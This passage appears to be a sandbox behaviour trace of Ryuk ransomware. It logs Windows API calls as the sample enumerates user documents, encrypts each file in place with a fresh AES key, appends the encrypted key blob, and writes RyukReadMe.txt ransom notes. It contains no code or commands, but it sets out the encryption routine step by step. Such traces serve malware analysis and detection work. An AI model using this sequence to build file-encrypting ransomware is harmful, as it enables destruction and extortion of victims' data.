liDistanceToMove=0x12ae6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.418] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0153.419] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.419] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0153.419] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0153.419] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.419] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x12c08, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x12c08, lpOverlapped=0x0) returned 1 [0153.420] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0153.420] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x12c08, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x12c10) returned 1 [0153.421] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.421] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x12c10, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x12c10, lpOverlapped=0x0) returned 1 [0153.421] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0153.421] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0153.421] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0153.421] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0153.421] CloseHandle (hObject=0x198) returned 1 [0153.450] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.453] CryptDestroyKey (hKey=0x3b8690) returned 1 [0153.453] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.454] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0153.454] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0153.454] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\Wv Aiw0iUZuvy0\\sKPKK_voS4AFQgD.pptx", dwFileAttributes=0x80) returned 1 [0153.454] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\Wv Aiw0iUZuvy0\\sKPKK_voS4AFQgD.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\wv aiw0iuzuvy0\\skpkk_vos4afqgd.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0153.454] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=2191) returned 1 [0153.454] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=2191) returned 1 [0153.454] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x76d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.454] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0153.455] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.455] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0153.455] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0153.455] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.455] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x88f, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x88f, lpOverlapped=0x0) returned 1 [0153.455] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0153.455] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x88f, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x890) returned 1 [0153.455] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.455] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x890, lpOverlapped=0x0) returned 1 [0153.456] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0153.456] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0153.456] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0153.456] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0153.456] CloseHandle (hObject=0x198) returned 1 [0153.471] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.496] CryptDestroyKey (hKey=0x3b8690) returned 1 [0153.496] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.496] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0153.496] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0153.496] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\Wv Aiw0iUZuvy0\\TTpwnxTrZp-XwO_B2I2w.rtf", dwFileAttributes=0x80) returned 1 [0153.497] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\Wv Aiw0iUZuvy0\\TTpwnxTrZp-XwO_B2I2w.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\wv aiw0iuzuvy0\\ttpwnxtrzp-xwo_b2i2w.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0153.497] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=95113) returned 1 [0153.497] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=95113) returned 1 [0153.497] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x17267, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.497] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0153.498] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.498] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0153.498] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0153.498] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.498] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x17389, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x17389, lpOverlapped=0x0) returned 1 [0153.499] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0153.499] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x17389, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x17390) returned 1 [0153.500] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.500] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x17390, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x17390, lpOverlapped=0x0) returned 1 [0153.500] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0153.500] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0153.500] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0153.501] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0153.501] CloseHandle (hObject=0x198) returned 1 [0153.516] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.520] CryptDestroyKey (hKey=0x3b8690) returned 1 [0153.520] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.520] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0153.520] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0153.520] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\Wv Aiw0iUZuvy0\\VS6 M.doc", dwFileAttributes=0x80) returned 1 [0153.521] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\Wv Aiw0iUZuvy0\\VS6 M.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\wv aiw0iuzuvy0\\vs6 m.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0153.521] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=67842) returned 1 [0153.521] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=67842) returned 1 [0153.521] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x107e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.521] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0153.522] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.522] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0153.522] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0153.522] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.522] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x10902, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x10902, lpOverlapped=0x0) returned 1 [0153.523] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0153.523] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x10902, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x10910) returned 1 [0153.523] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.523] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10910, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x10910, lpOverlapped=0x0) returned 1 [0153.523] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0153.524] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0153.524] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0153.524] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0153.524] CloseHandle (hObject=0x198) returned 1 [0153.917] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.922] CryptDestroyKey (hKey=0x3b8690) returned 1 [0153.923] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.923] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0153.923] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0153.923] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\Wv Aiw0iUZuvy0\\W8pKqw.doc", dwFileAttributes=0x80) returned 1 [0153.924] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\Wv Aiw0iUZuvy0\\W8pKqw.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\wv aiw0iuzuvy0\\w8pkqw.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0153.924] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=43924) returned 1 [0153.924] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=43924) returned 1 [0153.924] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xaa72, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.924] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0153.925] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.925] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0153.925] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0153.926] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.926] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0xab94, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xab94, lpOverlapped=0x0) returned 1 [0153.927] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0153.927] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xab94, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xaba0) returned 1 [0153.927] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.927] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xaba0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xaba0, lpOverlapped=0x0) returned 1 [0153.928] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0153.928] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0153.928] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0153.928] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0153.928] CloseHandle (hObject=0x198) returned 1 [0154.062] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.066] CryptDestroyKey (hKey=0x3b8690) returned 1 [0154.066] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.066] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0154.066] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0154.066] SetLastError (dwErrCode=0x0) [0154.066] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\Wv Aiw0iUZuvy0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\wv aiw0iuzuvy0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0154.067] GetLastError () returned 0x0 [0154.067] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0154.067] CloseHandle (hObject=0x194) returned 1 [0154.067] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0154.067] SetLastError (dwErrCode=0x0) [0154.067] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0154.068] GetLastError () returned 0xb7 [0154.068] CloseHandle (hObject=0x194) returned 1 [0154.068] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\yGbA IkZbi0YVm\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0154.068] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0154.068] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0154.068] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0154.068] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\yGbA IkZbi0YVm\\0MXT24y2tG.pptx", dwFileAttributes=0x80) returned 1 [0154.068] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\yGbA IkZbi0YVm\\0MXT24y2tG.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\ygba ikzbi0yvm\\0mxt24y2tg.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0154.068] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=62923) returned 1 [0154.068] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=62923) returned 1 [0154.068] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xf4a9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.068] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0154.069] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 